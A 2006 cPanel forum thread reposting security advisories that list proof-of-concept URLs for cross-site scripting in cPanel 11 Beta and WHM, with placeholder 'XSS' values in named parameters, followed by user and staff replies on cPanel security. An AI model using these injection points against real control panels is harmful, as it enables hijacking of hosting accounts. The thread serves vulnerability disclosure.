The Community Forums

Interact with an entire community of cPanel & WHM users!
  1. This site uses cookies. By continuing to use this site, you are agreeing to our use of cookies. Learn More.

CPanel 11 Beta Multiple Cross-Site Scripting

Discussion in 'General Discussion' started by ehostcoua, Nov 29, 2006.

  1. ehostcoua

    ehostcoua Registered

    Joined:
    Nov 4, 2006
    Messages:
    1
    Likes Received:
    0
    Trophy Points:
    1
    #Aria-Security Team Advisory
    #<www.Aria-security.Com For English >
    #<www.Aria-Security.net For Persian >
    #-----------------------------------------------------------
    #Software: CPanel
    #Tested On CPanel 11 Beta
    #Poc:
    #
    http://target:2082/frontend/x/files/fileop.html?opdir=[PATH]&opfile=[FILENAME]&fileop=XSS
    http://target:2082/frontend/x/files/editit.html?dir=/home/xdemo&file=XSS
    http://target:2082/frontend/x/files/createdir.html?dir=XSS
    http://target:2082/frontend/x/htaccess/dohtaccess.html?dir=xss
    http://target:2082/frontend/x/err/erredit.html?dir=XSS
    http://target:2082/frontend/x/err/erredit.html?dir=[DIRNAME]&file=XSS
    http://target:2082/frontend/x/files/createfile.html?dir=XSS
    #
    #P.S : Attacker must be authenticated
    #
    #Contact: Advisory@aria-security.net




    #Aria-Security Team Advisory
    #<www.Aria-security.Com For English >
    #<www.Aria-Security.net For Persian >
    #Original Advisory:
    #http://www.aria-security.com/forum/showthread.php?t=44
    #-----------------------------------------------------------
    #Software: WebHost Manager (WHM)
    #Tested WHM X v3.1.0 (demo.cpanel.net)
    #Poc:
    #
    http://target:2086/scripts2/dochangeemail?user=demo&domain=demo.com&email=XSS
    http://target:2086/cgi/addon_config...layusersubject=1&type=redirect&supporturl=XSS
    http://target:2086/scripts/editpkg?pkg=XSS
    http://target2086/scripts2/domts2?domain=XSS
    http://target:2086/scripts/editzone?domain=XSS
    http://target:2086/scripts2/dofeaturemanager?action=addfeature&feature=XSS
    http://target:2086/scripts/park?domain=demo.com&ndomain=XSS
    #
    #P.S : Attacker must be authenticated
    #
    #Contact: Advisory@aria-security.net
     
  2. MN-Robert

    MN-Robert Well-Known Member

    Joined:
    Feb 19, 2003
    Messages:
    203
    Likes Received:
    0
    Trophy Points:
    16
    It doesn't suprise me, security has gone out the window with cpanel.
     
  3. carluk

    carluk Well-Known Member

    Joined:
    Sep 2, 2003
    Messages:
    162
    Likes Received:
    0
    Trophy Points:
    16
    It's in edge at the moment as far as I can see. These problems are being fixed when reported (see change log) although worrying that they are there in the first place. Security is an especially high priority at cpanel given the recent problems according to a recent post by a cpanel guy on WHT - give that what authority you will.

    It should also be noted that people in glass houses should not throw stones. :)
     
  4. cPanelDavidG

    cPanelDavidG Technical Product Specialist

    Joined:
    Nov 29, 2006
    Messages:
    11,279
    Likes Received:
    8
    Trophy Points:
    38
    Location:
    Houston, TX
    cPanel Access Level:
    Root Administrator
    Security is a top priority here at cPanel and I would encourage anyone who stumbles across any security issues (not just XSS vulnerabilities) to submit them to security@cpanel.net

    In defense of the development team, I do know that they frequently look at and act upon reports from those particular websites. It is also important to note that cPanel 11 is not yet intended for production systems. If it was, we would be pushing the update out VIA Layer2 to upgrade everyone automatically (who has cPanel automatic update enabled).

    It's better to be sterilizing cPanel 11 of security flaws now than when it hits production environments.
     
Loading...

Share This Page